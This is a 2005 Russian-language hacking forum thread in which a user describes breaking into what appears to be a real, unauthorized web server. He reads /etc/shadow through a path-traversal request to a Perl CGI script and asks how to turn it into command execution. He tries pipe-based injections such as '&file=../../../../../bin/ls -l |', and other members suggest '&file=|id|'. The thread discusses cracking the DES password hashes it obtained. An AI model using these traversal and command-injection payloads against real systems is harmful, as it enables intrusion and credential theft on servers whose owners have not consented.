rst.void.ru
RusH security team
 
 [ Рекомендовано к прочтению ]   [ Поиск ]   [ Регистрация [ Профиль ]   [ Войти и проверить личные сообщения ]   [ Вход

_possible bug in main.php

 
Начать новую тему   Ответить на тему    Список форумов rst.void.ru -> General
Предыдущая тема :: Следующая тема  
Автор Сообщение
sam
Newbie


Зарегистрирован: 17.01.2005
Сообщения: 6

СообщениеДобавлено: Пн Янв 17, 2005 7:01 pm
    Заголовок сообщения: _possible bug in main.php
Ответить с цитатой

народ подскажите что я могу с этим сделать запрос: http://site.net/main.php

Warning: err(/inc/template.class.php): failed to open stream: No such file or directory in /home/posidelk-www/docs/main.php on line 326

Warning: err(): Failed opening '/inc/template.class.php' for inclusion (include_path='.:/usr/opt/php4_xml/lib/php') in /home/posidelk-www/docs/main.php on line 326

Fatal error: Cannot instantiate non-existent class: template in /home/posidelk-www/docs/main.php on line 327
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
n0.13g41
GOLD visitor


Зарегистрирован: 12.02.2004
Сообщения: 392

СообщениеДобавлено: Пн Янв 17, 2005 7:13 pm
    Заголовок сообщения:
Ответить с цитатой

не чё
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора ICQ Number
1dt.w0lf
moder


Зарегистрирован: 21.01.2003
Сообщения: 1408

СообщениеДобавлено: Пн Янв 17, 2005 7:56 pm
    Заголовок сообщения: Re: _possible bug in main.php
Ответить с цитатой

sam писал(а):
народ подскажите что я могу с этим сделать запрос: http://site.net/main.php

Warning: err(/inc/template.class.php): failed to open stream: No such file or directory in /home/posidelk-www/docs/main.php on line 326

Warning: err(): Failed opening '/inc/template.class.php' for inclusion (include_path='.:/usr/opt/php4_xml/lib/php') in /home/posidelk-www/docs/main.php on line 326

Fatal error: Cannot instantiate non-existent class: template in /home/posidelk-www/docs/main.php on line 327


а параметры какие передаешь? влиять на скрипт можешь как-то?
_________________
Все мы cможем попасть в рай. Главное подчистить логи...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора ICQ Number
sam
Newbie


Зарегистрирован: 17.01.2005
Сообщения: 6

СообщениеДобавлено: Пн Янв 17, 2005 9:58 pm
    Заголовок сообщения:
Ответить с цитатой

влес на борт через другую ошибку Smile))
/cgi-bin/index.pl?action=show_new_day&foldrix=11_2004&file=../../../../../etc/shadow
вам глоза неизмкняют.... админ урод апач под рутом держит Shocked
теперь другая проблемма как заставить его выполнять команды
open()
| вроде как пробывал непашет

any ideas???
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
1dt.w0lf
moder


Зарегистрирован: 21.01.2003
Сообщения: 1408

СообщениеДобавлено: Пн Янв 17, 2005 10:28 pm
    Заголовок сообщения:
Ответить с цитатой

sam писал(а):
влес на борт через другую ошибку Smile))
/cgi-bin/index.pl?action=show_new_day&foldrix=11_2004&file=../../../../../etc/shadow
вам глоза неизмкняют.... админ урод апач под рутом держит Shocked
теперь другая проблемма как заставить его выполнять команды
open()
| вроде как пробывал непашет

any ideas???


а как пробовал то? что выдало? больше инфы блин тут не телепаты.
_________________
Все мы cможем попасть в рай. Главное подчистить логи...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора ICQ Number
sam
Newbie


Зарегистрирован: 17.01.2005
Сообщения: 6

СообщениеДобавлено: Вт Янв 18, 2005 2:50 am
    Заголовок сообщения:
Ответить с цитатой

все ок пробовал разные скрипты на дырявосьт одним из них оказался main.php ..... он на каждое значение переменной выдавал ошибку указанною выше...вконце концов нашел дырку в переменной file
cgi-bin/index.pl?action=show_new_day&foldrix=11_2004&file=../../../../../etc/shadow
я могу читать фаелы но (пока) неисполнять команды ...теперь вопрос как я могу вылниь команды на серваке

&file=../../../../../bin/ls -l |
или
&file=../../../../../bin/ls -l\%00|

почемуtо некатят............прошу прощения за плохое пояснение плохо на русском печатаю ANy IDEAS????? Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
1dt.w0lf
moder


Зарегистрирован: 21.01.2003
Сообщения: 1408

СообщениеДобавлено: Вт Янв 18, 2005 7:57 am
    Заголовок сообщения:
Ответить с цитатой

sam писал(а):
все ок пробовал разные скрипты на дырявосьт одним из них оказался main.php ..... он на каждое значение переменной выдавал ошибку указанною выше...вконце концов нашел дырку в переменной file
cgi-bin/index.pl?action=show_new_day&foldrix=11_2004&file=../../../../../etc/shadow
я могу читать фаелы но (пока) неисполнять команды ...теперь вопрос как я могу вылниь команды на серваке

&file=../../../../../bin/ls -l |
или
&file=../../../../../bin/ls -l\%00|

почемуtо некатят............прошу прощения за плохое пояснение плохо на русском печатаю ANy IDEAS????? Smile


А ты уверен что
cgi-bin/index.pl?action=show_new_day&foldrix=11_2004&file=../../../../../etc/shadow
это не фейк? Очень слабо верится в сервак с веб-сервером работающим от рута.
_________________
Все мы cможем попасть в рай. Главное подчистить логи...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора ICQ Number
sam
Newbie


Зарегистрирован: 17.01.2005
Сообщения: 6

СообщениеДобавлено: Вт Янв 18, 2005 3:17 pm
    Заголовок сообщения:
Ответить с цитатой

незнаю фейк или не фейк tаким образом я могу читать любой файл на диске...
странно другое shadow несодержит учет зап roota
ну и волне ненормально на сегодняшний день шифроать пароли DES
че там говорить после расшифровки узнаю фейк shadow или нет ....
нyжно выолнение команд........есть одеи как обойти s/// ну или что там может быть v open()
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
fout
Newbie


Зарегистрирован: 05.05.2005
Сообщения: 3

СообщениеДобавлено: Сб Май 07, 2005 8:35 am
    Заголовок сообщения:
Ответить с цитатой

А так ?

&file=|id|
Вернуться к началу
Посмотреть профиль Отправить личное сообщение AIM Address ICQ Number
greenwood3
GOLD visitor


Зарегистрирован: 01.06.2004
Сообщения: 254

СообщениеДобавлено: Вс Май 08, 2005 5:07 pm
    Заголовок сообщения:
Ответить с цитатой

&file=|id

или так ?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора ICQ Number
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов rst.void.ru -> General Часовой пояс: GMT +3:00
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Powered by Invision Power Board © 2001-2004 IPB